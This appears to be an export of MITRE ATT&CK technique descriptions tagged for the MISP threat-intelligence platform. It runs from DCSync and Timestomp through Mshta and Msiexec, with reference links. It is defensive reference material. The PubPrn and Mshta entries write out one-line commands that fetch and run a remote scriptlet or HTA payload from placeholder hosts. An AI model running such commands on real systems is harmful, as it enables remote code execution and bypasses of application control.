Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller’s application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account’s password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)

DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)

The tag is: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006"

Table 3967. Table References
Links
https://attack.mitre.org/techniques/T1003/006
https://msdn.microsoft.com/library/cc228086.aspx
https://msdn.microsoft.com/library/dd207691.aspx
https://wiki.samba.org/index.php/DRSUAPI
https://source.winehq.org/WineAPI/samlib.html
https://adsecurity.org/?p=1729
http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
https://github.com/gentilkiwi/mimikatz/wiki/module-_{-lsadump[https://github.com/gentilkiwi/mimikatz/wiki/module-}-lsadump]
https://msdn.microsoft.com/library/cc237008.aspx
https://msdn.microsoft.com/library/cc245496.aspx

Timestomp - T1070.006

Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.

Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006"

Table 3968. Table References
Links
https://attack.mitre.org/techniques/T1070/006
http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html

SSH - T1021.004

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.

The tag is: misp-galaxy:mitre-attack-pattern="SSH - T1021.004"

Table 3969. Table References
Links
https://attack.mitre.org/techniques/T1021/004
https://capec.mitre.org/data/definitions/555.html
https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

VNC - T1021.005

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)

VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system’s authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)

Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)

The tag is: misp-galaxy:mitre-attack-pattern="VNC - T1021.005"

Table 3970. Table References
Links
https://attack.mitre.org/techniques/T1021/005
https://capec.mitre.org/data/definitions/555.html
https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in

DNS - T1071.004

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)

The tag is: misp-galaxy:mitre-attack-pattern="DNS - T1071.004"

Table 3971. Table References
Links
https://attack.mitre.org/techniques/T1071/004
https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling
https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Keylogging - T1056.001

Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:

Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
Reading raw keystroke data from the hardware buffer.
Windows Registry modifications.
Custom drivers.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"

Table 3972. Table References
Links
https://attack.mitre.org/techniques/T1056/001
https://capec.mitre.org/data/definitions/568.html
http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

PowerShell - T1059.001

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell’s underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"

Table 3973. Table References
Links
https://attack.mitre.org/techniques/T1059/001
https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx
https://github.com/jaredhaight/PSAttack
http://www.sixdub.net/?p=367
https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/
https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/
http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

Steganography - T1027.003

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim’s system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu)

By the end of 2017, a threat group used <code>Invoke-PSImage</code> to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim’s system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim’s machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)

The tag is: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003"

Table 3974. Table References
Links
https://attack.mitre.org/techniques/T1027/003
https://capec.mitre.org/data/definitions/636.html
https://en.wikipedia.org/wiki/Duqu
https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/

AppleScript - T1059.002

Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding <code>#!/usr/bin/osascript</code> to the start of the script file.(Citation: SentinelOne AppleScript)

AppleScripts do not need to call <code>osascript</code> to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s <code>NSAppleScript</code> or <code>OSAScript</code>;, both of which execute code independent of the <code>/usr/bin/osascript</code> command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they’re already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)

The tag is: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002"

Table 3975. Table References
Links
https://attack.mitre.org/techniques/T1059/002
https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html
https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/
https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/

DNS - T1590.002

Adversaries may gather information about the victim’s DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="DNS - T1590.002"

Table 3976. Table References
Links
https://attack.mitre.org/techniques/T1590/002
https://dnsdumpster.com/
https://www.circl.lu/services/passive-dns/

Cron - T1053.003

Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.

An adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Cron - T1053.003"

Table 3977. Table References
Links
https://attack.mitre.org/techniques/T1053/003
https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

Launchd - T1053.004

This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself.

Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for initial or recurring execution of malicious code. The <code>launchd</code> daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

An adversary may use the <code>launchd</code> daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. <code>launchd</code> can also be abused to run a process under the context of a specified account. Daemons, such as <code>launchd</code>, run with the permissions of the root user account, and will operate regardless of which user account is logged in.

The tag is: misp-galaxy:mitre-attack-pattern="Launchd - T1053.004"

Table 3978. Table References
Links
https://attack.mitre.org/techniques/T1053/004
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Python - T1059.006

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

The tag is: misp-galaxy:mitre-attack-pattern="Python - T1059.006"

Table 3979. Table References
Links
https://attack.mitre.org/techniques/T1059/006

JavaScript - T1059.007

Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

The tag is: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007"

Table 3980. Table References
Links
https://attack.mitre.org/techniques/T1059/007
https://nodejs.org/
https://docs.microsoft.com/windows/win32/com/translating-to-jscript
https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
https://redcanary.com/blog/clipping-silver-sparrows-wings/
https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/

Regsvr32 - T1218.010

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010"

Table 3981. Table References
Links
https://attack.mitre.org/techniques/T1218/010
https://support.microsoft.com/en-us/kb/249873
https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/
https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html

Confluence - T1213.001

Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:

Policies, procedures, and standards
Physical / logical network diagrams
System architecture diagrams
Technical system documentation
Testing / development credentials
Work / project schedules
Source code snippets
Links to network shares and other internal resources

The tag is: misp-galaxy:mitre-attack-pattern="Confluence - T1213.001"

Table 3982. Table References
Links
https://attack.mitre.org/techniques/T1213/001
https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html

PubPrn - T1216.001

Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn)

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).

The tag is: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001"

Table 3983. Table References
Links
https://attack.mitre.org/techniques/T1216/001
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn
https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/

MSBuild - T1127.001

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)

The tag is: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001"

Table 3984. Table References
Links
https://attack.mitre.org/techniques/T1127/001
https://msdn.microsoft.com/library/dd393574.aspx
https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element
https://lolbas-project.github.io/lolbas/Binaries/Msbuild/

Sharepoint - T1213.002

Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:

Policies, procedures, and standards
Physical / logical network diagrams
System architecture diagrams
Technical system documentation
Testing / development credentials
Work / project schedules
Source code snippets
Links to network shares and other internal resources

The tag is: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002"

Table 3985. Table References
Links
https://attack.mitre.org/techniques/T1213/002
https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2

CMSTP - T1218.003

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)

The tag is: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003"

Table 3986. Table References
Links
https://attack.mitre.org/techniques/T1218/003
https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)
https://twitter.com/ItsReallyNick/status/958789644165894146
https://msitpros.com/?p=3960
https://twitter.com/NickTyrer/status/958450014111633408
https://github.com/api0cradle/UltimateAppLockerByPassList
http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

InstallUtil - T1218.004

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.

InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)

The tag is: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004"

Table 3987. Table References
Links
https://attack.mitre.org/techniques/T1218/004
https://msdn.microsoft.com/en-us/library/50614e95.aspx
https://lolbas-project.github.io/lolbas/Binaries/Installutil/

Mshta - T1218.005

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

The tag is: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005"

Table 3988. Table References
Links
https://attack.mitre.org/techniques/T1218/005
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf
https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/
https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
https://en.wikipedia.org/wiki/HTML_Application
https://msdn.microsoft.com/library/ms536471.aspx
https://lolbas-project.github.io/lolbas/Binaries/Mshta/

Hardware - T1592.001

Adversaries may gather information about the victim’s host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).

The tag is: misp-galaxy:mitre-attack-pattern="Hardware - T1592.001"

Table 3989. Table References
Links
https://attack.mitre.org/techniques/T1592/001
https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
https://threatconnect.com/blog/infrastructure-research-hunting/

Msiexec - T1218.007

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007"

Table 3990. Table References
Links
https://attack.mitre.org/techniques/T1218/007
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
https://lolbas-project.github.io/lolbas/Binaries/Msiexec/
